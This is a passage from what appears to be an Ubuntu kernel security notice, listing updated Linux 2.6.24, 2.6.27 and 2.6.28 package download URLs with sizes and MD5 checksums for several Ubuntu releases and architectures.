http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb\n      Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   270064 879ee6667df636551d565e10ae5162fd\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   175444 37239b1899dd449d5b4985163c46d678\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    40398 81325db98acd64573c100455f0cb5289\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz\n      Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc\n      Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb\n      Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb\n      Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb\n      Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   186500 940e6b351f4975369720543184596a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   168150 696ed64f02936c7200cc9a468302de40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    68544 cd2e39978716c3448e54d6862877957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13614 c860448fa643364e8776a4947cff9714\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86942 49099dad48131ce191b10c154f096d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb\n      Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb\n      Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz\n      Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc\n      Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb\n      Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb\n      Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb\n      Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   215170 7939440a8813110d952d86b49113e146\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     8874 f173072403f51e6e6da399debd91068f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    13472 1399e0100a81d92448659b83949a62a6\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0\n    